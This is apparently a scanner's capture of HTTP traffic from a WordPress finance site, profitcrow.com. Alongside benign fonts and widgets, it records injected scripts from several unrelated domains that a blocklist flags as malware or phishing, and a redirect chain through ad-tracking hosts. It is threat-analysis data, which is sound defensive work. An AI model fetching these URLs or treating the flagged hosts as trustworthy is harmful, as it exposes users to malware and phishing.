Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /ajax/libs/font-awesome/6.0.0/webfonts/fa-solid-900.woff2 HTTP/1.1 
Host: cdnjs.cloudflare.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://profitcrow.com
Connection: keep-alive
Referer: https://cdnjs.cloudflare.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

search
                                         104.17.25.14
HTTP/2 200 OK
content-type: application/octet-stream; charset=utf-8
                                        
date: Fri, 25 Nov 2022 22:08:05 GMT
content-length: 126828
access-control-allow-origin: *
cache-control: public, max-age=30672000
etag: "620188b3-1ef6c"
last-modified: Mon, 07 Feb 2022 21:01:39 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
vary: Accept-Encoding
cf-cache-status: HIT
age: 7145923
expires: Wed, 15 Nov 2023 22:08:05 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CB7eu7RzhfN3zxYdsPKA%2FtgJxvGL0a%2BYgZLi0feJqUXpdXkAnk4%2BwH14eobuM8VwOSQNDAdp0z6kVJ1RFVbJw32MvP04FlmzDcYqv3svE8hsOAn19BheFF6hpM2%2BDjiqRfvX4Bdw"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 76fdb371adb9b506-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 126828, version 768.256\012- data
Size:   126828
Md5:    297973a488f688271dd223d542ba2697
Sha1:   ed99d812e4c88826335f93acede3fad85c90fb54
Sha256: 1b099f88c06ed0869872561c157f0ec9cbe133a0939d9ece4ee1e1f54bd4683d
                                        
                                            GET /ajax/libs/font-awesome/6.0.0/webfonts/fa-brands-400.woff2 HTTP/1.1 
Host: cdnjs.cloudflare.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://profitcrow.com
Connection: keep-alive
Referer: https://cdnjs.cloudflare.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

search
                                         104.17.25.14
HTTP/2 200 OK
content-type: application/octet-stream; charset=utf-8
                                        
date: Fri, 25 Nov 2022 22:08:05 GMT
content-length: 104544
access-control-allow-origin: *
cache-control: public, max-age=30672000
etag: "620188b3-19860"
last-modified: Mon, 07 Feb 2022 21:01:39 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding
cf-cache-status: HIT
age: 20309511
expires: Wed, 15 Nov 2023 22:08:05 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vC%2BYAVF0QxF6OGVbTLJxNulZ4qMjcRS6VkBfS1Ip0lsRSLchc%2BTtwTsV46q7NZoQparMWyvHcfACWEbNGkHJhPXIh0AxAfI6rSfpS2ZBsWPFhAh1qI5Ow93WzTwpMVAx4VNgsQgl"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 76fdb371adbeb506-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 104544, version 768.256\012- data
Size:   104544
Md5:    a9afdb72826cde196ddf29eb8f9d0f8f
Sha1:   69fc982ace0b9fdd2cfa68c6628bcaad00f407fd
Sha256: 29bc44694c394921d1f00271128a2e4cd8293516216e24eac07a73fa821fc1f5
                                        
                                            POST / HTTP/1.1 
Host: zerossl.ocsp.sectigo.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         104.18.32.68
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 25 Nov 2022 22:08:05 GMT
Content-Length: 316
Connection: keep-alive
Last-Modified: Wed, 23 Nov 2022 10:55:04 GMT
Expires: Wed, 30 Nov 2022 10:55:03 GMT
Etag: "dc9f47b7d53de57981087087e2a148c3439b2402"
Cache-Control: max-age=391017,s-maxage=1800,public,no-transform,must-revalidate
X-CCACDN-Proxy-ID: mcdpinlb3
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 76fdb371ffc10b55-OSL

                                        
                                            POST / HTTP/1.1 
Host: ocsp.sca1b.amazontrust.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         143.204.42.156
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Content-Length: 471
Connection: keep-alive
Accept-Ranges: bytes
Cache-Control: max-age=137117
Date: Fri, 25 Nov 2022 22:08:05 GMT
Etag: "6380aa3f-1d7"
Expires: Sun, 27 Nov 2022 12:13:22 GMT
Last-Modified: Fri, 25 Nov 2022 11:42:55 GMT
Server: ECS (dcb/7F82)
X-Cache: Miss from cloudfront
Via: 1.1 057fdebf738f5915bf38a78949190758.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: 4si3StyH6e6n9bTs8SRZnTnRErOWZ8mpFuV2uB6x5mDxVdLhDQ9rvg==
Age: 1827

                                        
                                            GET /track.js?v=9.999 HTTP/1.1 
Host: trick.cofounderspecials.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         91.211.91.112
HTTP/1.1 404 Not Found
Content-Type: text/html
                                        
Server: nginx
Date: Fri, 25 Nov 2022 22:08:05 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Last-Modified: Fri, 29 Jul 2022 15:36:49 GMT
ETag: W/"5b0-5e4f36b22e013"
Content-Encoding: gzip


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text
Size:   729
Md5:    604eea713faef1ae8dafc0224112e662
Sha1:   89f4a04f3088b7fdb308cd0af944a38c6ed99c2b
Sha256: 3905c65876c7b7c1f0a8efae5c758b100d3903c2f94e7177285e898c80eb10f2

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST / HTTP/1.1 
Host: zerossl.ocsp.sectigo.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         104.18.32.68
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 25 Nov 2022 22:08:05 GMT
Content-Length: 316
Connection: keep-alive
Last-Modified: Wed, 23 Nov 2022 10:55:04 GMT
Expires: Wed, 30 Nov 2022 10:55:03 GMT
Etag: "dc9f47b7d53de57981087087e2a148c3439b2402"
Cache-Control: max-age=391017,s-maxage=1800,public,no-transform,must-revalidate
X-CCACDN-Proxy-ID: mcdpinlb6
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 76fdb3715db20b06-OSL

                                        
                                            POST / HTTP/1.1 
Host: zerossl.ocsp.sectigo.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         104.18.32.68
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 25 Nov 2022 22:08:05 GMT
Content-Length: 316
Connection: keep-alive
Last-Modified: Wed, 23 Nov 2022 10:55:04 GMT
Expires: Wed, 30 Nov 2022 10:55:03 GMT
Etag: "dc9f47b7d53de57981087087e2a148c3439b2402"
Cache-Control: max-age=391017,s-maxage=1800,public,no-transform,must-revalidate
X-CCACDN-Proxy-ID: mcdpinlb4
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 76fdb3721f80b4ee-OSL

                                        
                                            GET /wp-content/uploads/2021/12/Hue_Saturation-1.png HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/wp-content/uploads/elementor/css/post-6.css
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: image/png
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:05 GMT
last-modified: Fri, 24 Dec 2021 05:34:49 GMT
accept-ranges: bytes
content-length: 274736
date: Fri, 25 Nov 2022 22:08:05 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 1920 x 825, 8-bit/color RGBA, non-interlaced\012- data
Size:   274736
Md5:    8148085f8be86c27e55ac1ebfcede4f3
Sha1:   8614958426bd898d140fccded6f498621e0c2a67
Sha256: c46f0a60b61fa9a29497ba2780a5d8d6a0156bd8854dc9750c1d02dc758f62aa
                                        
                                            GET /go.php?id=9677-22-5680954-11 HTTP/1.1 
Host: away.cdnbestplatform.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

search
                                         91.211.91.104
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:06 GMT
content-length: 414
vary: Accept-Encoding
content-encoding: gzip
strict-transport-security: max-age=15768000;
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, ASCII text, with CRLF line terminators
Size:   414
Md5:    2195bef4e17d775027cbb80db63e6f18
Sha1:   1a4ccabbd3b9d4048a70c2bbba0e9911b6081a16
Sha256: 4773d2081026ee36a5f87fc0a2b9c257d1b44b23d67b8187fcb9c031eeadcfe5

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/elementor/assets/lib/font-awesome/webfonts/fa-solid-900.ttf HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447; trainmeassyst=1
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: font/ttf
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:06 GMT
last-modified: Thu, 23 Dec 2021 05:08:51 GMT
accept-ranges: bytes
content-length: 202744
date: Fri, 25 Nov 2022 22:08:06 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  TrueType Font data, 13 tables, 1st "FFTM", 28 names, Macintosh\012- data
Size:   202744
Md5:    605ed7926cf39a2ad5ec2d1f9d391d3d
Sha1:   c1b9fae262f42868c075ac865a8ab34920e20a2c
Sha256: 3d06af1f31cd83ace7a265a014b8fb5dee15770ecac8f7a55555190e627e03c2

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.249
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "366FADC9DDD844F08D7221F39A82B1D11F30F4E60C16B0A6C413F9CE59B2D327"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21600
Expires: Sat, 26 Nov 2022 04:08:07 GMT
Date: Fri, 25 Nov 2022 22:08:07 GMT
Connection: keep-alive

                                        
                                            GET /?p=meygky3cmm5gi3bpg42tmmy&sub2=dfastspeed17 HTTP/1.1 
Host: blueskymotions.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://away.cdnbestplatform.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

search
                                         185.177.94.108
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:07 GMT
access-control-allow-origin: *
set-cookie: uuid=ede59595-4aac-48f8-ba4c-16b1da54c3a0; expires=Sun, 25-Dec-2022 22:08:07 GMT; Max-Age=2592000; path=/; domain=blueskymotions.net
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document, Unicode text, UTF-8 text, with very long lines (29334)
Size:   53094
Md5:    4f71824f663aeaca1fe5c429583d7ed1
Sha1:   752c61875bc0159c6f250d121037208e15c40d3b
Sha256: f898c854c4dbc1d57ab9b9e0f7c37ac5c0d49e61dd64e9d384f9a9d929bcfe60
                                        
                                            GET /2.0/v/0.42.63/runboard/runboard.css HTTP/1.1 
Host: freeserv-static.dukascopy.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://freeserv.dukascopy.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-site
TE: trailers

search
                                         104.22.7.183
HTTP/2 200 OK
content-type: text/css
                                        
date: Fri, 25 Nov 2022 22:08:05 GMT
last-modified: Tue, 03 May 2022 08:54:50 GMT
vary: Accept-Encoding
etag: W/"6270edda-7e72"
expires: Tue, 29 Nov 2022 16:08:47 GMT
cache-control: max-age=604800
content-encoding: gzip
strict-transport-security: max-age=63072000; includeSubDomains
cf-cache-status: HIT
age: 280758
server: cloudflare
cf-ray: 76fdb373afa7fac8-OSL
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (32370), with no line terminators
Size:   8120
Md5:    097f20cd8af38062abcfd6d605b4806b
Sha1:   8205885c03337b589441595cf670963cc4183650
Sha256: a7d3c5bcaffd1bbb13cf27fbb8c53e6d037da63edbae23114dcd5706e71717b0
                                        
                                            GET /wp-content/uploads/2022/03/rm373batch4-07-11.png HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/wp-content/uploads/elementor/css/post-6.css
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: image/png
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:05 GMT
last-modified: Tue, 29 Mar 2022 07:14:13 GMT
accept-ranges: bytes
content-length: 98678
date: Fri, 25 Nov 2022 22:08:05 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 1920 x 1477, 8-bit colormap, non-interlaced\012- data
Size:   33271
Md5:    e1a901c26fadecf3957e9727cb284195
Sha1:   eeb0dd0b74e04b8fa4d2b99e3816a2739d2ab94b
Sha256: 8c4dbb37efe743ca182a1499329cd0e3926138f5079a07951653d128e489273c
                                        
                                            GET /visualization/financial/charts/v1/HistoricalPrices?app-key=F533042BF81842ADBF5DA2F24C79C4A6&symbol=AAPL&dividends=true&splits=true&palette=Financial-Light HTTP/1.1 
Host: api.stockdio.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

search
                                         34.232.23.18
HTTP/2 200 OK
content-type: text/html; charset=utf-8
                                        
date: Fri, 25 Nov 2022 22:08:05 GMT
content-length: 67777
set-cookie: AWSALB=dxTWw/NWL51e/q8woKZP85fllJLD9v5q4rFrNQuIvz7caEE5Jo5lYvK/LpOKv1G/G5SF4r5jYzxBuopbCtN4HqmmvDB31L6fI+dA5PEW8BJoJmJ0a753IGMXOJRP; Expires=Fri, 02 Dec 2022 22:08:05 GMT; Path=/ AWSALBCORS=dxTWw/NWL51e/q8woKZP85fllJLD9v5q4rFrNQuIvz7caEE5Jo5lYvK/LpOKv1G/G5SF4r5jYzxBuopbCtN4HqmmvDB31L6fI+dA5PEW8BJoJmJ0a753IGMXOJRP; Expires=Fri, 02 Dec 2022 22:08:05 GMT; Path=/; SameSite=None; Secure
cache-control: private
server: Microsoft-IIS/10.0
x-aspnet-version: 4.0.30319
x-powered-by: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (697), with CRLF line terminators
Size:   39283
Md5:    9ba5d142e000263fa4aaf9e9c37a4854
Sha1:   2ff4634251b004860087bcb69d48a547b20d41d5
Sha256: 9925b12681abed6d2e1ae8543c705e2f2cf70ff7a69f79ab34149d9d98be1cae
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: 0.blueskymotions.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://0.blueskymotions.net/?p=meygky3cmm5gi3bpg42tmmy&sub2=dfastspeed17
Cookie: uuid=ede59595-4aac-48f8-ba4c-16b1da54c3a0; uuid=ede59595-4aac-48f8-ba4c-16b1da54c3a0
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         185.177.94.108
HTTP/2 204 No Content
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:07 GMT
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
X-Firefox-Spdy: h2

                                        
                                            GET /sw/w1s.js HTTP/1.1 
Host: dn9.biz
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://0.blueskymotions.net/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
TE: trailers

search
                                         195.154.50.108
HTTP/2 200 OK
content-type: application/javascript; charset=UTF-8
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:08 GMT
access-control-allow-origin: *
expires: Sat, 25 Nov 2023 22:08:08 GMT
cache-control: max-age=31536000
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   1378
Md5:    34c00cf5443febeae48dc3c896896d69
Sha1:   ce1d1d13e299e89fe868e917f48a92b82a1363b3
Sha256: 793861760be013eec01e380fcc6b939e702437cfa71e43a67cba51c243dfc903
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.249
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "1613886E84406DCC6B175B2273D8BB1A58B035D16ED71FE53A65386B21247F03"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=10700
Expires: Sat, 26 Nov 2022 01:06:29 GMT
Date: Fri, 25 Nov 2022 22:08:09 GMT
Connection: keep-alive

                                        
                                            GET /2.0/?path=realtime_sentiment_index/index&liquidity=consumers&type=swfx&showPairs=true&showCurrencies=true&availableInstruments=l%3AEUR/USD%2CGBP/USD%2CUSD/CHF%2CUSD/JPY%2CAUD/USD%2CXAU/USD%2CE_SandP-500%2CE_Brent&availableCurrencies=AUD%2CCAD%2CCHF%2CGBP%2CJPY%2CNZD%2CUSD%2CEUR&headingColor=%23000000&dateColor=%23000000&bgColor=%23ffffff&width=940&height=535&adv=popup HTTP/1.1 
Host: freeserv.dukascopy.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

search
                                         194.8.15.120
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:05 GMT
content-encoding: gzip
vary: Accept-Encoding
strict-transport-security: max-age=63072000; includeSubDomains
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /?auf=mzstkzrrgq5diojygyxtonjwgmxtemrpge3dmojuge2daobx&s=1&sub1=&sub2=dfastspeed17&sub3=&sub4=&cpc=0&cpm=0 HTTP/1.1 
Host: 0.blueskymotions.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://0.blueskymotions.net/?p=meygky3cmm5gi3bpg42tmmy&sub2=dfastspeed17
Cookie: uuid=ede59595-4aac-48f8-ba4c-16b1da54c3a0; uuid=ede59595-4aac-48f8-ba4c-16b1da54c3a0
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         185.177.94.108
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:08 GMT
access-control-allow-origin: *
set-cookie: uuid=ede59595-4aac-48f8-ba4c-16b1da54c3a0; expires=Sun, 25-Dec-2022 22:08:08 GMT; Max-Age=2592000; path=/
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /2.0/v/0.42.63/rsindex/rsindex.css HTTP/1.1 
Host: freeserv-static.dukascopy.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://freeserv.dukascopy.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-site
TE: trailers

search
                                         104.22.7.183
HTTP/2 200 OK
content-type: text/css
                                        
date: Fri, 25 Nov 2022 22:08:05 GMT
last-modified: Tue, 03 May 2022 08:54:50 GMT
vary: Accept-Encoding
etag: W/"6270edda-4718"
expires: Fri, 02 Dec 2022 13:56:25 GMT
cache-control: max-age=604800
content-encoding: gzip
strict-transport-security: max-age=63072000; includeSubDomains
cf-cache-status: HIT
age: 29500
server: cloudflare
cf-ray: 76fdb373bfb7fac8-OSL
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /sort.js?v=100 HTTP/1.1 
Host: scripts.bettershitecolumn.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         91.211.91.104
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:05 GMT
last-modified: Wed, 31 Aug 2022 20:23:49 GMT
vary: Accept-Encoding
etag: W/"630fc355-92c"
expires: Thu, 31 Dec 2037 23:55:55 GMT
cache-control: max-age=315360000
strict-transport-security: max-age=15768000;
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /stick.js?v=7.77.7 HTTP/1.1 
Host: new.weatherplllatform.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         91.211.91.114
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
server: nginx
date: Fri, 25 Nov 2022 22:08:05 GMT
last-modified: Sun, 06 Nov 2022 00:27:12 GMT
vary: Accept-Encoding
